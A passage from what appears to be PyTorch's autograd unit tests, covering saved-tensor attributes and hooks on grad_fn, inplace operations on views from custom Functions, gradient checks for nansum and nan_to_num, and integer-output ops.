out = a[:, indices]
self.assertEqual(out.grad_fn._saved_indices, (None, indices)) # c10::List<c10::optional<Tensor>> -> Tuple[Tensor?]
self.assertIsInstance(out.grad_fn._saved_indices[1], torch.Tensor)
self.assertIsInstance(out.grad_fn._raw_saved_indices[1], torch._C._autograd.SavedTensor)
self.assertEqual(out.grad_fn._saved_self_sizes, a.shape) # IntArrayRef -> Tuple[int]
self.assertIsInstance(out.grad_fn._saved_self_sizes[0], int)
out.grad_fn._raw_saved_indices[1].register_hooks(lambda x: x, lambda x: x)
with self.assertRaisesRegex(RuntimeError, "None is forbidden"):
out.grad_fn._raw_saved_indices[0].register_hooks(lambda x: x, lambda x: x)
a = torch.ones(2, 2, requires_grad=True)
out = a * a
out.grad_fn._raw_saved_self.register_hooks(lambda x: x, lambda x: x)
out.sum().backward()
with self.assertRaisesRegex(RuntimeError, "after it has been freed"):
out.grad_fn._raw_saved_self.register_hooks(lambda x: x, lambda x: x)
a = torch.ones(1, 1, 2, requires_grad=True)
out = torch.nn.functional.interpolate(a, 4, mode="linear")
self.assertEqual(out.grad_fn._saved_output_size, (4,)) # c10::optional<IntArrayRef> -> int[]?
self.assertIsInstance(out.grad_fn._saved_output_size[0], int)
self.assertEqual(out.grad_fn._saved_align_corners, False) # bool -> bool
self.assertIsInstance(out.grad_fn._saved_align_corners, bool)
self.assertIsNone(out.grad_fn._saved_scale_factors) # c10::optional<ArrayRef<double>> -> float[]?
out = torch.nn.functional.interpolate(a, scale_factor=0.5, mode="linear")
self.assertIsNone(out.grad_fn._saved_output_size)
self.assertEqual(out.grad_fn._saved_scale_factors, (0.5,))
self.assertIsInstance(out.grad_fn._saved_scale_factors[0], float)
a = torch.ones(2, 2, requires_grad=True)
out = torch.pdist(a, p=1)
self.assertEqual(out.grad_fn._saved_p, 1.) # double -> float
self.assertIsInstance(out.grad_fn._saved_p, float)
a = torch.ones(1, 1, 2, requires_grad=True)
out = torch.logit(a, 1.)
self.assertEqual(out.grad_fn._saved_eps, 1.) # c10:optional<double> -> float?
self.assertIsInstance(out.grad_fn._saved_eps, float)
out = torch.logit(a)
self.assertIsNone(out.grad_fn._saved_eps)
if torch._C.has_lapack:
a = torch.ones(1, 1, requires_grad=True)
q, r = torch.linalg.qr(a, mode="reduced")
self.assertEqual(q.grad_fn._saved_mode, "reduced") # std::string -> str
a = torch.tensor([1.], requires_grad=True)
out = torch.div(a, 2., rounding_mode="trunc")
self.assertEqual(out.grad_fn._saved_rounding_mode, "trunc") # c10::optional<std::string> -> str?
out = torch.div(a, 2., rounding_mode=None)
self.assertIsNone(out.grad_fn._saved_rounding_mode) # c10::optional<std::string> -> str?
x = torch.zeros(5, requires_grad=True)
out = torch.threshold(x, threshold=(1 + 0j), value=(1 + 0j))
self.assertIsInstance(out.grad_fn._saved_threshold, complex) # Scalar(complex double) -> complex
cfloat = torch.tensor(1 + 0j, dtype=torch.complex64)
out = torch.threshold(x, threshold=cfloat, value=(1 + 0j))
self.assertIsInstance(out.grad_fn._saved_threshold, complex) # Scalar(complex float) -> complex
out = torch.threshold(x, threshold=1., value=1.)
self.assertIsInstance(out.grad_fn._saved_threshold, float) # Scalar(floating point) -> float
out = torch.threshold(x, threshold=1, value=1)
self.assertIsInstance(out.grad_fn._saved_threshold, int) # Scalar(integral) -> int
out = torch.threshold(x, threshold=False, value=False)
self.assertIsInstance(out.grad_fn._saved_threshold, bool) # Scalar(bool) -> bool
a = torch.ones(2, 2, requires_grad=True)
out = a.as_strided((3,), (1,), 1)
self.assertEqual(out.grad_fn._saved_storage_offset, 1) # c10:optional<int64_t> -> int?
self.assertIsInstance(out.grad_fn._saved_storage_offset, int)
out = a.as_strided((3,), (1,))
self.assertIsNone(out.grad_fn._saved_storage_offset)
a = torch.ones(2, requires_grad=True)
out = torch.tanh(a)
self.assertEqual(out, out.grad_fn._saved_result) # saved variable when output
a = torch.randn(3, 5, requires_grad=True)
b = torch.tensor([1, 0, 4])
loss = nn.NLLLoss()
out = loss(a, b)
self.assertIsNone(out.grad_fn._saved_weight)
loss = nn.NLLLoss(weight=torch.ones((5,)))
out = loss(a, b)
self.assertEqual(out.grad_fn._saved_weight, torch.ones((5,))) # c10:optional<Tensor> -> Tensor?
out.sum().backward()
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
out.grad_fn._saved_weight
def test_cant_create_saved_tensors(self):
with self.assertRaisesRegex(RuntimeError, "Trying to create a SavedTensor object from Python is forbidden"):
torch.autograd.SavedTensor()
def test_custom_function_saved_tensors(self):
def getFn(save=True):
class MyFn(Function):
@staticmethod
def forward(ctx, x):
if save:
ctx.save_for_backward(x, None)
return x
@staticmethod
def backward(ctx, g):
return g
return MyFn
a = torch.randn(5, requires_grad=True)
y = getFn(True).apply(a)
self.assertEqual((a, None), y.grad_fn.saved_tensors)
saved = y.grad_fn._raw_saved_tensors
self.assertIsInstance(saved[0], torch._C._autograd.SavedTensor)
# We can't tell the underlying tensor is None without unpacking it
self.assertIsInstance(saved[1], torch._C._autograd.SavedTensor)
# We catch that error when the user calls register_hooks on it
with self.assertRaisesRegex(RuntimeError, "None is forbidden"):
saved[1].register_hooks(lambda x: x, lambda x: x)
with self.assertRaisesRegex(TypeError, "incompatible function arguments"):
saved[0].register_hooks(lambda x: x)
with self.assertRaisesRegex(TypeError, "incompatible function arguments"):
saved[0].register_hooks(1, 1)
saved[0].register_hooks(lambda x: x, lambda x: x)
with self.assertRaisesRegex(RuntimeError, "already been set"):
saved[0].register_hooks(lambda x: x, lambda x: x)
y.sum().backward()
# Using a reference to the SavedTensor object after the
# saved variables have been released can lead to undefined behavior
del saved
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
y.grad_fn._raw_saved_tensors
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
y.grad_fn.saved_tensors
y = getFn(False).apply(a)
self.assertEqual(y.grad_fn.saved_tensors, ())
self.assertEqual(y.grad_fn._raw_saved_tensors, ())
def test_autograd_views_codegen(self):
# This is not necessarily the absolute correct behavior, but this is the current
# one. This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
# Note that any change in these test will be BC-breaking and should be done carefully.
# This test checks the behavior of two codegen functions (view_as and unbind)
# with respect to view tracking and inplace operation on the output.
def run_test(grad_mode, requires_grad, is_view, should_raise_tuple):
def maybe_check_raise(fn, should_raise):
self.assertTrue(should_raise is None or isinstance(should_raise, str))
if should_raise is not None:
with self.assertRaisesRegex(RuntimeError, should_raise):
fn()
else:
fn()
inp = torch.rand(2, requires_grad=requires_grad).clone()
with torch.set_grad_enabled(grad_mode):
out = inp.view_as(inp)
# Are they differentiable views?
self.assertTrue(out._is_view() == is_view)
# Are inplace allowed?
maybe_check_raise(lambda: out.add_(1), should_raise_tuple[0])
inp = torch.rand(2, requires_grad=requires_grad).clone()
with torch.set_grad_enabled(grad_mode):
out = inp.unbind()
# Are they differentiable views?
self.assertTrue(out[0]._is_view() == is_view)
self.assertTrue(out[1]._is_view() == is_view)
# Are inplace allowed?
maybe_check_raise(lambda: out[0].add_(1), should_raise_tuple[1])
maybe_check_raise(lambda: out[1].add_(1), should_raise_tuple[2])
# should_raise contains None if it should not raise
# should_raise contains a string of the error if it should raise
# The 3 elements are for view_as, first output of unbind and second output of unbind
run_test(grad_mode=True, requires_grad=False, is_view=True,
should_raise_tuple=(None, None, None))
inp_change_err = "Output {} of UnbindBackward is a view and is being modified inplace."
run_test(grad_mode=True, requires_grad=True, is_view=True,
should_raise_tuple=(None, inp_change_err.format("0"), inp_change_err.format("1")))
leaf_grad_err = "A view was created in no_grad mode and is being modified inplace"
run_test(grad_mode=False, requires_grad=True, is_view=True,
should_raise_tuple=(leaf_grad_err, leaf_grad_err, leaf_grad_err))
run_test(grad_mode=False, requires_grad=False, is_view=True,
should_raise_tuple=(None, None, None))
def test_inplace_not_requires_grad(self):
class MyFn(torch.autograd.Function):
@staticmethod
def forward(ctx, inp):
return inp.view_as(inp)
@staticmethod
def backward(ctx, grad):
return grad
# Original Tensor does not require grad
a = torch.rand(1, 2)
# Tensor being written does require grad
b = torch.rand(1, requires_grad=True)
# Take an invalid view on 'a' that should raise an error (warns during deprecation)
view_a = MyFn.apply(a)
with self.assertRaisesRegex(RuntimeError, "This view was created inside a custom Function"):
view_a += b
# Extra test for copy_ that is a manual implementation and could be easily
# forgotten when the codegen is updated (warns during deprecation)
a = torch.rand(1, 2)
b = torch.rand(1, requires_grad=True)
view_a = MyFn.apply(a)
with self.assertRaisesRegex(RuntimeError, "This view was created inside a custom Function"):
view_a.copy_(b)
# Functions that should throw must properly throw
a = torch.rand(1, 2)
b = torch.rand(1, requires_grad=True)
view_a = a.unbind()[0]
with self.assertRaisesRegex(RuntimeError, "This view is the output of a function that returns "
"multiple views."):
view_a.copy_(b)
# Sanity check that views that should work still work
a = torch.rand(1, 2)
b = torch.rand(1, requires_grad=True)
a.select(1, 0).copy_(b)
def _do_test_autograd_simple_views_python(self, dtype):
# This is not necessarily the absolute correct behavior, but this is the current
# one. This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
# Note that any change in these test will be BC-breaking and should be done carefully.
# This checks the autograd.Function behavior when we return one or multiple outputs
# while one of these is an input, a view of an input or of a temporary tensor.
# This indicator is used to track how many times the backward function was called
bw_called = [0]
# This indicator is used to check if the argument `ga` contains non-zero values
ga_nz = [False]
class IdOneOutput(Function):
@staticmethod
def forward(ctx, a, b, make_view):
if make_view:
a = a.narrow(0, 0, 2)
else:
a = a.clone()
return a
@staticmethod
def backward(ctx, ga):
bw_called[0] += 1
return ga, None, None
class IdTwoOutput(Function):
@staticmethod
def forward(ctx, a, b, make_view):
if make_view:
a = a.narrow(0, 0, 2)
else:
a = a.clone()
return a, a + b
@staticmethod
def backward(ctx, ga, gab):
bw_called[0] += 1
if ga.eq(0).all():
ga_nz[0] = False
else:
ga_nz[0] = True
return ga + gab, gab, None
class ViewOfTemp(Function):
@staticmethod
def forward(ctx, a, make_view):
ctx.save_for_backward(a)
if make_view:
a = a.narrow(0, 0, 2)
else:
a = a.clone()
b = a.clone()
return b.select(0, 0)
@staticmethod
def backward(ctx, grad):
bw_called[0] += 1
a, = ctx.saved_tensors
res = torch.zeros_like(a)
res.select(0, 0).copy_(grad)
return res, None
fn_id_to_inplace_on_view_err_msg = {
"one_output": ("Output 0 of IdOneOutputBackward is a view and is being "
"modified inplace. This view was created inside a custom Function"),
"two_output": ("Output 0 of IdTwoOutputBackward is a view and is being modified inplace."
" This view is the output of a function that returns multiple views."),
"view_of_temp": ("Output 0 of ViewOfTempBackward is a view and is being "
"modified inplace. This view was created inside a custom Function")
}
for fn_id in ["one_output", "two_output", "view_of_temp"]:
for inplace in [True, False]:
for make_view in [True, False]:
# Used for special casing the tests below
output_is_a_view = (make_view or fn_id == "view_of_temp")
def fn(a, b):
# never modify a, b inplace for gracheck
a = a.clone()
b = b.clone()
if fn_id == "two_output":
tmp1, tmp2 = IdTwoOutput.apply(a, b, make_view)
if inplace:
tmp1 += 3
tmp2 += 3
else:
tmp1 = tmp1 + 3
tmp2 = tmp2 + 3
tmp = tmp1 * tmp2
else:
if fn_id == "one_output":
tmp = IdOneOutput.apply(a, b, make_view)
else:
tmp = ViewOfTemp.apply(a + b, make_view)
if inplace:
tmp += 3
else:
tmp = tmp + 3
return tmp.sum()
a = torch.ones(2, dtype=dtype, requires_grad=True)
b = torch.ones(2, dtype=dtype, requires_grad=True)
err_msg = fn_id_to_inplace_on_view_err_msg[fn_id]
if not inplace or not output_is_a_view:
gradcheck(fn, (a, b), check_batched_grad=False)
# Was the custom backward called properly
bw_called[0] = 0
ga_nz[0] = True # For the case where the backward is called
if inplace and output_is_a_view:
with self.assertRaisesRegex(RuntimeError, err_msg):
fn(a, b)
else:
fn(a, b).backward()
expected_called = 1
expected_ga_nz = True
if output_is_a_view and inplace:
expected_called = 0
self.assertTrue(bw_called[0] == expected_called)
self.assertTrue(ga_nz[0] == expected_ga_nz)
def test_autograd_simple_views_python(self):
self._do_test_autograd_simple_views_python(torch.double)
self._do_test_autograd_simple_views_python(torch.cdouble)
def test_autograd_inplace_views_creation_meta(self):
# Tests creation_meta properly handled for inplace views
class Func(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
return x.view_as(x)
@staticmethod
def backward(ctx, x):
return x
view_custom = Func.apply
def run_test(fn, fn_type, grad_mode_view, grad_mode_iview, requires_grad, error1, error2):
# This test checks the behavior of inplace-view functions when
# the views are created in grad mode or not
base = torch.rand(2, 3, requires_grad=requires_grad).clone()
# 1. Create a view with `grad_mode=grad_mode_view`
with torch.set_grad_enabled(grad_mode_view):
if fn_type == "multi_view":
inp = base.unbind()[0]
elif fn_type == "custom" :
inp = view_custom(base)
else:
inp = base.view_as(base)
# 2. Perform inplace view with `grad_mode=grad_mode_iview`
with torch.set_grad_enabled(grad_mode_iview):
if error1 is not None:
with self.assertRaisesRegex(RuntimeError, error1):
fn(inp)
return
else:
# If error is None, check that runs without error
fn(inp)
# 3. Do inplace on the (new) view
if error2 is not None:
with self.assertRaisesRegex(RuntimeError, error2):
inp.add_(1)
else:
# If error is None, check that runs without error
inp.add_(1)
no_grad_err = "A view was created in no_grad mode"
multi_view_err = "function that returns multiple views"
custom_err = "view was created inside a custom Function"
def run_tests(fn):
for fn_type in ("normal", "multi_view", "custom"):
for grad_mode_view in (True, False):
for grad_mode_iview in (True, False):
for requires_grad in (True, False):
error1 = None # expected error when we do inplace_view on original view
error2 = None # expected error when we do inplace on the resulting view
if requires_grad:
if not grad_mode_view and grad_mode_iview:
error1 = no_grad_err
if not grad_mode_view and not grad_mode_iview:
error2 = no_grad_err
if fn_type == "multi_view":
if grad_mode_view and grad_mode_iview:
error1 = multi_view_err
if grad_mode_view and not grad_mode_iview:
error2 = multi_view_err
if fn_type == "custom":
if grad_mode_view and grad_mode_iview:
error1 = custom_err
if grad_mode_view and not grad_mode_iview:
error2 = custom_err
run_test(fn, fn_type, grad_mode_view, grad_mode_iview, requires_grad, error1, error2)
# This list was created by logging gen_inplace_or_view_type.py
# detach_ is excluded for this test because it cannot be applied to
# views and thus does not return a view
run_tests(lambda v: v.as_strided_((1, 0), (2, 2)))
run_tests(lambda v: v.transpose_(0, 0))
run_tests(lambda v: v.t_())
run_tests(lambda v: v.squeeze_(0))
run_tests(lambda v: v.unsqueeze_(0))
run_tests(lambda v: v.swapdims_(0, 0))
run_tests(lambda v: v.swapaxes_(0, 0))
# TODO This is not the correct behavior -
# See https://github.com/pytorch/pytorch/issues/49825#issuecomment-794466627
def test_autograd_inplace_views_cross_dtype(self):
# This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
a_orig = torch.rand(3, 3, requires_grad=True, dtype=torch.complex64)
a = a_orig.clone()
b = torch.view_as_real(a)
b = b.transpose(0, 1)
b += 1
b.backward(torch.arange(0, 18, dtype=torch.float).view(3, 3, 2))
non_inplace_grad = a_orig.grad
a_orig = torch.rand(3, 3, requires_grad=True, dtype=torch.complex64)
a = a_orig.clone()
b = torch.view_as_real(a)
b.transpose_(0, 1)
b += 1
b.backward(torch.arange(0, 18, dtype=torch.float).view(3, 3, 2))
inplace_grad = a_orig.grad
# TODO: this is a bug!
# once this is fixed, it should have the transpose removed:
# self.assertTrue(torch.allclose(non_inplace_grad, inplace_grad))
self.assertEqual(non_inplace_grad.T, inplace_grad)
def test_autograd_multiple_views_python(self):
# This is not necessarily the absolute correct behavior, but this is the current
# one. This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
# Note that any change in these test will be BC-breaking and should be done carefully.
# This checks that multiples views in the forward are properly traced and how they
# behave with respect to inplace operations.
# This indicator is used to track how many times the backward function was called
bw_called = [0]
class ComplexView(Function):
@staticmethod
def forward(ctx, a, idx):
res = a.narrow(0, idx, 1)
res = a.select(0, idx)
ctx.save_for_backward(a)
ctx.idx = idx
return res
@staticmethod
def backward(ctx, grad):
bw_called[0] += 1
a, = ctx.saved_tensors
res = torch.zeros_like(a)
res.select(0, ctx.idx).copy_(grad)
return res, None
a = torch.ones(2, requires_grad=True)
idx = 1
bw_called[0] = 0
out = ComplexView.apply(a.clone(), idx)
out.sum().backward()
self.assertTrue(bw_called[0] == 1)
out = ComplexView.apply(a.clone(), idx)
with self.assertRaisesRegex(RuntimeError,
"Output 0 of ComplexViewBackward is a view and is being modified inplace"):
out += 1
def test_autograd_python_custom_function_inplace(self):
# This is not necessarily the absolute correct behavior, but this is the current
# one. This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
# Note that any change in these test will be BC-breaking and should be done carefully.
# This test checks custom autograd.Function that perform inplace operations
bw_called = [0]
# I) Single output
class MyAdder(Function):
@staticmethod
def forward(ctx, a, b):
a.add_(b)
ctx.mark_dirty(a)
return a
@staticmethod
def backward(ctx, grad):
bw_called[0] += 1
return grad, grad
a = torch.ones(2, requires_grad=True)
b = torch.ones(2, requires_grad=True)
# No extra inplace
c = MyAdder.apply(a.clone(), b)
c.sum().backward()
self.assertTrue(bw_called[0] == 1)
# With extra inplace on the output
bw_called[0] = 0
c = MyAdder.apply(a.clone(), b)
c += 2
c.sum().backward()
self.assertTrue(bw_called[0] == 1)
# The input is a view
bw_called[0] = 0
c = MyAdder.apply(a.clone().view_as(a), b)
c.sum().backward()
self.assertTrue(bw_called[0] == 1)
# Should not give non-inputs to mark_dirty
class MyAdderBad(Function):
@staticmethod
def forward(ctx, a, b):
c = 3 * a
c.add_(b)
ctx.mark_dirty(c)
return c
@staticmethod
def backward(ctx, grad):
bw_called[0] += 1
grad = 3 * grad
return grad, grad
a = torch.ones(2, requires_grad=True)
b = torch.ones(2, requires_grad=True)
with warnings.catch_warnings(record=True) as w:
MyAdderBad.apply(a.clone(), b)
self.assertEqual(len(w), 1)
# II) Multiple outputs
class MyBadAdder(Function):
@staticmethod
def forward(ctx, a, b):
a.add_(b)
ctx.mark_dirty(a)
return a, a + b
@staticmethod
def backward(ctx, ga, gab):
bw_called[0] += 1
return ga + gab, ga + gab
# No extra inplace
bw_called[0] = 0
c, d = MyBadAdder.apply(a.clone(), b)
(c * d).sum().backward()
self.assertTrue(bw_called[0] == 1)
# With extra inplace on the output
bw_called[0] = 0
c, d = MyBadAdder.apply(a.clone(), b)
c += 2
(c * d).sum().backward()
self.assertTrue(bw_called[0] == 1)
# The input is a view
inplace_on_view_err = "your Function modifies inplace an input that is a view of another Tensor"
with self.assertRaisesRegex(RuntimeError, inplace_on_view_err):
c, d = MyBadAdder.apply(a.clone().view_as(a), b)
# III) Inplace + other op
class MyOutPlaceAdder(Function):
@staticmethod
def forward(ctx, a, b):
a.add_(b)
ctx.mark_dirty(a)
return a.clone(), a + b
@staticmethod
def backward(ctx, ga, gab):
bw_called[0] += 1
return ga + gab, ga + 2 * gab
# We don't reuse the input
def fn(a, b):
orig_a = a.clone().view_as(a)
c, d = MyOutPlaceAdder.apply(orig_a, b)
return (c * d).sum()
bad_mark_dirty_err = "Some elements marked as dirty during the forward method were not returned as output."
with self.assertRaisesRegex(RuntimeError, bad_mark_dirty_err):
fn(a, b)
def test_named_tensor_for_complex_views(self):
names = ["batch", "height", "width", "complex"]
z = torch.ones((5, 12, 14, 2), requires_grad=True)
z_named = z.refine_names(*names)
z_complex = torch.view_as_complex(z_named.rename(None)).refine_names(*names[:-1])
z_complex.sum().backward()
self.assertEqual(z.grad, torch.view_as_real(torch.ones_like(z_complex).rename(None)))
def test_custom_function_return_view_in_nograd(self):
class Alias(Function):
@staticmethod
def forward(ctx, x):
return x[:]
@staticmethod
def backward(ctx, gx):
return gx
inp = torch.rand(2, requires_grad=True)
with torch.no_grad():
output = Alias.apply(inp)
with torch.no_grad():
expected_output = inp[:]
# Calling the custom function should operate as if we called an equivalent op
self.assertEqual(output.requires_grad, expected_output.requires_grad)
# Check that in-place modification on view throws
leaf_grad_err = "A view was created in no_grad mode and is being modified inplace"
with self.assertRaisesRegex(RuntimeError, leaf_grad_err):
output.zero_()
def test_grad_mode_restored_reentrant(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, inp):
return inp.clone()
@staticmethod
def backward(ctx, go):
original = torch._C.is_grad_enabled()
with torch.enable_grad():
self.assertTrue(torch._C.is_grad_enabled())
foo = torch.rand(go.size(), requires_grad=True)
grad, = torch.autograd.grad(
foo ** 3, foo, grad_outputs=go
)
self.assertTrue(torch._C.is_grad_enabled())
self.assertTrue(torch._C.is_grad_enabled() == original)
return grad
inp = torch.rand(3, requires_grad=True)
# Case where original==False
MyFunction.apply(inp).sum().backward()
# Case where original==True
MyFunction.apply(inp).sum().backward(create_graph=True)
def test_power_function(self):
a = torch.tensor([0., 0., 0.])
b = torch.tensor([-1., 0., 1.], requires_grad=True)
c = torch.sum(a**b)
c.backward()
self.assertEqual(b.grad, torch.tensor([-inf, 0., 0.]))
s = 0
b = torch.tensor([-1., 0., 1.], requires_grad=True)
c = torch.sum(s**b)
c.backward()
self.assertEqual(b.grad, torch.tensor([-inf, 0., 0.]))
def test_nansum_with_nans(self):
a = torch.randn(2, 2, 2, 2, dtype=torch.double)
with torch.no_grad():
a[a < 0.2] = float('nan')
a.requires_grad = True
# No args
gradcheck(lambda x: x.nansum(), a)
gradgradcheck(lambda x: x.nansum(), a)
# Single dim
gradcheck(lambda x: x.nansum((0)), a)
gradgradcheck(lambda x: x.nansum((0)), a)
# Multi dim
gradcheck(lambda x: x.nansum((0, 2)), a)
gradgradcheck(lambda x: x.nansum((0, 2)), a)
gradcheck(lambda x: x.nansum((0, -1)), a)
gradgradcheck(lambda x: x.nansum((0, -1)), a)
# With keep-dim
gradcheck(lambda x: x.nansum((0, -1), True), a)
gradgradcheck(lambda x: x.nansum((0, -1), True), a)
def test_nansum_dtype(self):
inp = torch.randn(2, 2, 2, 2)
with torch.no_grad():
inp[inp < 0.2] = float('nan')
def test(inp, inp_dtype, out_dtype):
with torch.no_grad():
a = inp.to(inp_dtype)
a.requires_grad = True
b = torch.sum(a, dtype=out_dtype)
b.backward()
self.assertEqual(a.dtype, a.grad.dtype)
test(inp, torch.float, torch.double)
test(inp, torch.double, torch.float)
def test_nan_to_num(self):
a = torch.randn(3, 3, 3, 3, dtype=torch.double)
with torch.no_grad():
a[torch.rand_like(a) < 0.2] = float('nan')
a[torch.rand_like(a) < 0.2] = float('inf')
a[torch.rand_like(a) < 0.2] = -float('inf')
a.requires_grad = True
gradcheck(lambda x: x.nan_to_num(), a)
gradgradcheck(lambda x: x.nan_to_num(), a)
gradcheck(lambda x: x.nan_to_num(nan=1.2), a)
gradgradcheck(lambda x: x.nan_to_num(nan=1.2), a)
gradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0), a)
gradgradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0), a)
gradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0, neginf=-2.0), a)
gradgradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0, neginf=-2.0), a)
gradcheck(lambda x: x.nan_to_num(posinf=2.0, neginf=-2.0), a)
gradgradcheck(lambda x: x.nan_to_num(posinf=2.0, neginf=-2.0), a)
gradcheck(lambda x: x.nan_to_num(neginf=-2.0), a)
gradgradcheck(lambda x: x.nan_to_num(neginf=-2.0), a)
def test_custom_function_error(self):
class BadFw(Function):
@staticmethod
def backward(ctx, foo):
return foo
class BadBw(Function):
@staticmethod
def forward(ctx, foo):
return foo.clone()
inp = torch.rand(1, requires_grad=True)
with self.assertRaisesRegex(NotImplementedError, "must implement the forward"):
BadFw.apply(inp)
with self.assertRaisesRegex(RuntimeError, "must implement the backward"):
BadBw.apply(inp).sum().backward()
def test_custom_function_local_inplace(self):
class MyFn(torch.autograd.Function):
@staticmethod
def forward(ctx, inp, inplace):
view = inp.clone()[:3]
if inplace:
view += 2
return view
@staticmethod
def backward(ctx, grad):
return grad, None
base = torch.rand(10, requires_grad=True)
foo = MyFn.apply(base, False)
self.assertEqual(foo.grad_fn.__class__.__name__, "MyFnBackward")
foo = MyFn.apply(base, True)
self.assertEqual(foo.grad_fn.__class__.__name__, "MyFnBackward")
def test_integer_outputs(self):
inp = torch.rand(4, requires_grad=True)
out = inp.argmax()
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
out = inp.argmin()
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
out = inp.argsort()
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
val = torch.rand((), requires_grad=True)
out = torch.searchsorted(inp, val)
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
bins = torch.linspace(0, 1.0, steps=100, requires_grad=True)
vals = torch.rand(5, 5, requires_grad=True)
out = torch.bucketize(vals, bins)
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
val = torch.empty(5).requires_grad_()
out = val.count_nonzero()
self.assertFalse(out.requires_grad)
def assert_only_first_requires_grad(res):
if not isinstance(res, tuple):
res = (res,)
self.assertTrue(res[0].requires_grad)
for out in res[1:]:
if out is not None:
self.assertFalse(out.requires_grad)
for sort in [True, False]:
for return_inverse in [True, False]:
for return_counts in [True, False]:
res = torch.unique(inp, sorted=sort, return_inverse=return_inverse,
return_counts=return_counts)
assert_only_first_requires_grad(res)
res = torch.unique(inp, sorted=sort, return_inverse=return_inverse,
return_counts=return_counts, dim=0)
assert_only_first_requires_grad(res)
res = torch.unique_consecutive(inp, return_inverse=return_inverse,
return_counts=return_counts)
assert_only_first_requires_grad(res)
res = torch.unique_consecutive(inp, return_inverse=return_inverse,
return_counts=return_counts, dim=0)
assert_only_first_requires_grad(res)
# Here we test the internal functions to make sure all of them are
# covered on top of the public API
res = torch._unique(inp, sorted=sort, return_inverse=return_inverse)
assert_only_first_requires_grad(res)
# This looks public but is actually manually deleted from the
# torch namespace in torch/functional.py
res = torch._VF.unique_dim(inp, dim=0, sorted=sort, return_inverse=return_inverse,
return_counts=return_counts)
assert_only_first_requires_grad(res)
# We don't test `unique_dim_consecutive` here.
# It looks public but the python binding is actually manually disabled in
# tools/autograd/gen_python_functions.py
res = torch._unique2(inp, sorted=sort, return_inverse=return_inverse,
return_counts=return_counts)
assert_only_first_requires_grad(res)
def test_custom_function_cycle(self):
class MyFn(Function):
@staticmethod
def forward(ctx, x, metadata):
x = x.clone()
ctx.meta = metadata
ctx.save_for_backward(x)
return x
@staticmethod
def backward(ctx, gO):
x, = ctx.saved_tensors
self.assertEqual(x, 3.14)
self.assertEqual(ctx.meta["foo"], 3.14)
return gO * x, None
def get_refs(with_backward):
a = torch.tensor(3.14, requires_grad=True)
metadata = {}
out = MyFn.apply(a, metadata)
metadata["foo"] = out
if with_backward:
out.sum().backward()
self.assertEqual(a.grad, a)
return torch._C._WeakTensorRef(out)
with disable_gc():
ref = get_refs(False)
self.assertFalse(ref.expired())
gc.collect()
self.assertTrue(ref.expired())
# The backward clears the saved_variables but not the __dict__
with disable_gc():
ref = get_refs(True)
self.assertFalse(ref.expired())
gc.collect()
self.assertTrue(ref.expired())
def test_input_buffer_accum(self):
leaf = torch.rand(2, 2, requires_grad=True)
# An op that returns sparse gradients
ind = torch.tensor([[0, 0]], dtype=torch.long)
out2 = leaf.gather(0, ind, sparse_grad=True)
# An op that returns the gradients as-is
out1 = leaf.clone()
grad_out1_original = torch.rand_like(out1)
grad_out1 = grad_out1_original.clone()
grad_out2 = torch.rand_like(out2)
torch.autograd.backward((out1, out2), (grad_out1, grad_out2))
# Given gradients should not be modified inplace
self.assertEqual(grad_out1, grad_out1_original)
def test_no_unnecessary_unwrapping(self):
a = torch.randn(5, requires_grad=True)
a_orig = a.detach().clone()
b = a * a
c = a * b
d = torch.exp(a)
# a is leaf
self.assertIs(b.grad_fn._saved_self, a)
self.assertIs(b.grad_fn._saved_other, a)
self.assertIs(c.grad_fn._saved_self, a)
# b is not an output
self.assertIs(c.grad_fn._saved_other, b)
# d is an output
self.assertEqual(d.grad_fn._saved_result, d)
self.assertIsNot(d.grad_fn._saved_result, d)
c.sum().backward()
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
c.grad_fn._saved_self
# a is left untouched
self.assertEqual(a, a_orig)
def test_saved_variable_version_counter(self):
a = torch.rand(2, requires_grad=True)
b = torch.exp(a)
b_unpacked = b.grad_fn._saved_result
self.assertEqual(b, b_unpacked)
self.assertEqual(b._version, b_unpacked._version)
with torch.no_grad():
b += 1
self.assertEqual(b, b_unpacked)
self.assertEqual(b._version, b_unpacked._version)
def test_saved_variable_packing_unpacking_saved_original(self):
def test(get_input, is_leaf):
a = get_input()
grad_fn = a.grad_fn
y = a * a
y.grad_fn._raw_saved_self.register_hooks(lambda x: 2 * x, lambda x: x / 2)
self.assertEqual(a, y.grad_fn._saved_self)
if not is_leaf:
self.assertIs(grad_fn, y.grad_fn._saved_self.grad_fn)
y.sum().backward()
else:
y.sum().backward()
self.assertEqual(2 * a, a.grad)
a = get_input()
grad_fn = a.grad_fn
y = a * a
y.grad_fn._raw_saved_self.register_hooks(lambda x: 2 * x, lambda x: x)
self.assertEqual(2 * a, y.grad_fn._saved_self)
if not is_leaf:
self.assertIs(grad_fn, y.grad_fn._saved_self.grad_fn)
y.sum().backward()
else:
y.sum().backward()
self.assertEqual(3 * a, a.grad)
# double backward
a = get_input()
grad_fn = a.grad_fn
y = a ** 3
y.grad_fn._raw_saved_self.register_hooks(lambda x: x, lambda x: x)
s = torch.sum(y)
g, = torch.autograd.grad(s, (a, ), create_graph=True)
if not is_leaf:
self.assertIs(grad_fn, y.grad_fn._saved_self.grad_fn)
g.sum().backward()
else:
g.sum().backward()
self.assertEqual(6 * a, a.grad)
